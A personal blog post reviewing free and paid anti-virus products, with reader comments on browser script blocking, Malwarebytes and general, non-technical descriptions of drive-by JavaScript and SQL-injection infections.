A short discourse on Anti-Virus products…

A lot of the blog posts start as discussions on Facebook and then grow into something I think may have general audience appeal. This post started that way, as a discussion on cleaning a system after infection, and now has evolved into a discussion/review of anti-virus products.

My baseline security is Windows Firewall combined with MSE; also with the NoScript and AdBlocker filters in Firefox, and just AdBlocker in Chrome. I only use IE for the RVCC site and some Microsoft corporate contacts. Once you get a basic install up and running you should image that, and use it as the baseline for future restores. I run full-system images on a monthly basis with snapshots on some of the mission-critical stuff (some directories are on every-4-hour replication!).

Free AV = generally loss-leader advertising for the full product; MSE is the only real-time freeware AV I know of which does not function as beggarware. Clam-AV doesn’t make the grade as it is a batch scanner only.

MSE = Microsoft Security Essentials = free (as in beer) basic antivirus protection; low impact on host system; does its job quietly without a lot of fuss.

Clam-AV = batch-mode anti-virus scanner; no real-time component; thus it is useful as a recovery tool or on an email or webserver to test uploaded items.

The rest of these comments reflect my experience with the paid versions of AV products. I have or have had paid subscriptions with all of the following:

AVG = big, bloated, really trying to outdo Norton and McAfee for useless but cute features, and growing more expensive all the time.

Avast = cute but often behind the times on virus definitions; starts begging for renewal at the 40% mark; gets hyper over normal traffic when using the firewall product.

Norton = McAfee = Trend Micro = bloatware. The fact all of these require a special “removal tool” should suffice as a warning not to get these products.

Kaspersky = when it works, it works well. When it works. And therein lies the problem and the reason I can’t recommend it.

Zone Alarm = when it first came out, this was a decent product. BUT the company had no real business plan and eventually sold out to Checkpoint, who turned it into the hyper-active scare-ware typical of most consumer firewalls. IF properly configured it works well, at least until it is broken by the next update.

Advertisements

9 thoughts on “A short discourse on Anti-Virus products…”

  1. I have a theory that the hyper activeness of some malware products is just a strategy of above named “beggarware”. They prompt the user as much as possible to make it’s self known and to scare the user into thinking it’s doing it’s job and doing it well and that they couldn’t last a minute on a computer without it’s protection. Perhaps even convincing the user to upgrade to more protection, like the email and web surfing security that most products offer in paid versions.

  2. NoScript is a default install for you? I hope you don’t block all javascript because your missing out on some of the finer points of the interwebs! I don’t have flash even installed on my MacBook Air as I like my battery more than annoying flash ads and although I started it as a test to see how long I have lasted, I really don’t miss it. Now that I think about it, since I started build on the web I haven’t used/installed AdBlocker either.

    I use MSE on just about everything now because it is free, it’s lightweight, doesn’t take up much processes, quick scans in the tray bar (it’s the little things sometimes), and generally works well. Is it the best AV out there? No probably not however I am no authority.

  3. @Frank – I run NoScript as a default; when I approach a new site I do a quick check to see where the javascript is coming from – if it’s all local or from known hosts then I hit the “approve for all” and reload.

    The default behaviour of everything off has saved me from infection countless times – especially on self-hosted wordpress or typepad blogs – where the local admin may not understand how to spot or protect from SQL-injection infections.

    AdBlocker does some of the same thing – it can block malware via banner ads (if they’re null-routed they can’t infect) and I tend to auto-block flash until I can see where it’s sourcing from.

    Just because I’m paranoid doesn’t mean they’re not out to get me.

  4. @Bill – Can you give me an example of what you mean by, “The default behaviour of everything off has saved me from infection countless times” — maybe I a bit naive here but I cannot remember what types of infections are coming from javascript being turned on and would like to look into them!

    Yeah you are being a bit paranoid I think, I can see the logic in looking to see where files are coming from but if I use Google’s CDN to pull jQuery from, is that a flag in your head?

    On a similar topic I was asking a question on Quora, Is Malwarebytes’ Anti-Malware worth purchasing?

    I have used it for free and appreciate it most out of the few Spyware and Malware removal tools I use (the few I use being SUPER Anti-Spyware, Microsoft Security Essentials, & Spybot Search & Destroy) and am considering purchasing it for scheduling, automatic updates & other features.

    The answers I got were interesting but none led down the path I was trying to go. One post was a general answer about A\V vs. Spyware scanners and we got into a discussion about bloatware Internet Security Suites where I stood my ground saying they were ‘too much’ for most people. He had a good argument too though as well. =)

  5. I trust Google’s repositories – I do NOT trust javascript from the .cn domain, or .ua or .ru or several other places. (The country codes above are China, Ukraine and Russia, but there are many others I distrust).

    There are LOTS of Javascript vectors for attack – but typically the malware constructs an iframe and then pops up a misleading message, leading the user to click, with the click-event set to download malware. Note if an iframe is used the entire client screen can now be defined as the “accept” button…

    Another approach is to make a simple API call to find out if there are other tabs loaded, and examine contents thereof, or to transmit back cookies, or other nasty surprises. Javascript is often used for malware delivery – why do you think NoScript exists in the first place?

    For further reading, here is a new article: http://nakedsecurity.sophos.com/2011/02/13/hacking-the-web-hijacking-search-results/ – and note this attack vector is nearly a year old.

    ———————————————-

    So far as Malwarebytes Anti-Malware: I have purchased one license although I consider it more of a donation as the product has been worthwhile as an after-the-fact cleanup tool in a number of cases. It’s not something I would routinely install.

  6. There are LOTS of Javascript vectors for attack – but typically the malware constructs an iframe and then pops up a misleading message, leading the user to click, with the click-event set to download malware. Note if an iframe is used the entire client screen can now be defined as the “accept” button…

    – yes but you are not the typical user, which is why I am poking. =)

    Why do you think NoScript exists in the first place?

    – I actually don’t know anymore because I honestly don’t read up on security as much as I used to, I thought, rather innocently that most of the reasons NoScript existed a decade ago have been for problems that have been solved other places. Thanks for the link though, going to read up a little now. =D

    ___________________________________________

    If Malwarebytes Anti-Malware did a great job at preventing spyware/adware than it would be worth the purchase. If it does a much better job at removing after the fact vs. preventing it probably wouldn’t be worth the purchase (this was what I was hoping to get out of that discussion).

    By the way — for some reason I am not getting email notifications despite the first confirmation email telling me I have signed up for the “[x] Nofigy me of follow-up comments via email.”. I am now just going to attempt to ” [x] Subscribe by email to this site” to see what that does, if anything at all.

  7. I don’t know how wordpress.com handles notifications – this is my only shot at using the freebie hosted version of wordpress – good luck with that.

    NoScript originated to fix basic bad Javascript. But it has hung on due to the rash of SQL-injection infections – it really is easy to get infected on a drive-by basis – especially for unwary users who blandly click “OK” to anything to get going.

    SQL-injection is the reason to go back and make sure all the infrastructure code is up-to-date and you’ve followed recommendations for security – otherwise a remote program can force-feed undesired code into your site.

  8. In reference to anti-virus protection, I have purchase 3 licenses of norton 360 security product. I am very happy so for in it in protecting my computers. It is easy to load and use, also it backs up me system weekly.
    I am going to look into the security products you have discussed, mainly MSE.

  9. @Martin Musial – Norton A/V has to be less resource hungry than they used to be however I still hold strong that they take up way too many resources on boot and therefore slow down your computer. This is coming from a former tech though so I am sure I am biased. =D

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s